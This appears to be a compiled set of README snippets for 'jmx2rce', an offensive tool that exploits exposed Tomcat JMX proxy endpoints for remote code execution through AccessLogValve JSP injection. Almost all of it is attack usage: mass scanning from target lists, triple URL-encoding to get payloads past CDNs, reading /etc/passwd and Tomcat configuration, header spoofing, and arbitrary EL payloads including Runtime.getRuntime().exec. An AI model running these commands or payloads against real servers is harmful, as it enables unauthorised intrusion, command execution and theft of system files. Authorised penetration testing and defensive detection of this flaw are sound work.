### Build and Install jmx2rce Source: https://github.com/hacktus/jmx2rce/blob/main/README.md Commands to clone the repository and build the tool from source. ```bash git clone https://github.com/hacktus/jmx2rce.git cd jmx2rce/tool go build -o jmx2rce jmx2rce.go ./jmx2rce -h ``` -------------------------------- ### URL Encoding for CDN Traversal Source: https://github.com/hacktus/jmx2rce/blob/main/README.md Example of the triple-encoding strategy used to bypass CDN/proxy mangling of EL syntax. ```text Target value: %{X-Payload}i URL parameter: %2525%257BX-Payload%257Di Decoding chain: CDN layer: %2525 -> %25, %257B -> %7B, %257D -> %7D Tomcat layer: %25 -> %, %7B -> {, %7D -> } Final value: %{X-Payload}i ``` -------------------------------- ### Cleanup Server Configuration Source: https://github.com/hacktus/jmx2rce/blob/main/README.md Commands to restore the original server configuration after testing. ```bash jmx2rce cleanup -H target.com # If the original docBase was different from ROOT jmx2rce cleanup -H target.com -docbase /opt/tomcat/webapps/ROOT ``` -------------------------------- ### Read Arbitrary Files Source: https://github.com/hacktus/jmx2rce/blob/main/README.md Commands to read files from the server by reconfiguring the ROOT webapp's docBase. ```bash # Read /etc/passwd jmx2rce read -H target.com -p /etc/passwd # Read Tomcat configuration jmx2rce read -H target.com -p /opt/tomcat/conf/server.xml ``` -------------------------------- ### Use HTTP Scheme with jmx2rce Source: https://context7.com/hacktus/jmx2rce/llms.txt Force the use of HTTP instead of HTTPS by specifying the -scheme http flag. ```bash jmx2rce -scheme http rce -H target.example.com:8080 ``` -------------------------------- ### Enable SSL Certificate Verification in jmx2rce Source: https://context7.com/hacktus/jmx2rce/llms.txt Enable SSL certificate verification using the -verify flag. This is disabled by default. ```bash jmx2rce -verify scan -H target.example.com ``` -------------------------------- ### Scan a target host with jmx2rce Source: https://github.com/hacktus/jmx2rce/blob/main/README.md Executes a vulnerability scan against a specified host with a defined timeout. ```bash $ jmx2rce scan -H vulnerable-target.example.com -timeout 10 _____ __ ____ ___ ____ ________ / / |/ |/ /\ \/ / |/ _ \/ ___/ __/ __/ / /|_/ /> < ) /| / , _/ /__/ _/ /___/_/ /_/_/|_/_/|_|_/_/|_|\___/___/ Tomcat JMX Proxy → RCE via AccessLogValve Injection By: hacktus [*] Scanning 1 host(s) with 20 threads, timeout 10s [+] vulnerable-target.example.com - VULNERABLE - Apache Tomcat/10.1.8 [+] Found 1 vulnerable host(s): vulnerable-target.example.com - Apache Tomcat/10.1.8 ``` -------------------------------- ### Single Host Scan with Nuclei Source: https://context7.com/hacktus/jmx2rce/llms.txt Perform a scan on a single target URL using a Nuclei template. ```bash nuclei -t tomcat-jmxproxy-unauth.yaml -u https://target.example.com ``` -------------------------------- ### Scan for Vulnerable Hosts with Nuclei Source: https://github.com/hacktus/jmx2rce/blob/main/README.md Nuclei templates for identifying unauthenticated JMX proxy access. ```bash nuclei -t tomcat-jmxproxy-unauth.yaml -l targets.txt ``` ```bash nuclei -t tomcat-jmxproxy-unauth.yaml -u https://target.com ``` -------------------------------- ### Scan for Vulnerable Hosts with jmx2rce Source: https://github.com/hacktus/jmx2rce/blob/main/README.md Commands to detect Tomcat instances with exposed JMX proxy endpoints. ```bash # Scan a single host jmx2rce scan -H target.com # Scan from a file with 50 threads jmx2rce scan -f targets.txt -t 50 # Save results as JSON jmx2rce scan -f targets.txt -o results.json # Verbose output for debugging jmx2rce -v scan -H target.com ``` -------------------------------- ### Add Custom Headers with jmx2rce Source: https://context7.com/hacktus/jmx2rce/llms.txt Add custom headers to requests using the -header flag. This is useful for authentication or bypassing CDNs. ```bash jmx2rce -header "X-Forwarded-For: 127.0.0.1" -header "Authorization: Bearer token" scan -H target.example.com ``` -------------------------------- ### Scan Targets with Nuclei Source: https://context7.com/hacktus/jmx2rce/llms.txt Scan a list of targets from a file using a specified Nuclei template. ```bash nuclei -t tomcat-jmxproxy-unauth.yaml -l targets.txt ``` -------------------------------- ### Suppress Banner Output with jmx2rce Source: https://context7.com/hacktus/jmx2rce/llms.txt Use the -q flag to suppress banner output, useful for scripting and automated tasks. ```bash jmx2rce -q scan -f targets.txt ``` -------------------------------- ### Execute Remote Code Source: https://github.com/hacktus/jmx2rce/blob/main/README.md Commands to perform RCE via AccessLogValve JSP injection. ```bash # Default proof-of-concept payload (evaluates 7*7*7 and leaks server info) jmx2rce rce -H target.com # Custom EL payload jmx2rce rce -H target.com -payload '${System.getProperty("user.name")}' # Runtime command execution (Tomcat 9+ with EL 3.0) jmx2rce rce -H target.com -payload '${Runtime.getRuntime().exec("id")}' ``` -------------------------------- ### Disable Colored Output in jmx2rce Source: https://context7.com/hacktus/jmx2rce/llms.txt Disable colored output for log files using the -no-color flag. Redirect output to a file for logging. ```bash jmx2rce -no-color scan -f targets.txt > scan.log 2>&1 ``` -------------------------------- ### Combined Nuclei Templates Scan Source: https://context7.com/hacktus/jmx2rce/llms.txt Scan targets using multiple Nuclei templates and save the results to an output file. ```bash nuclei -t tomcat-jmxproxy-unauth.yaml -t other-templates/ -l targets.txt -o results.txt ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.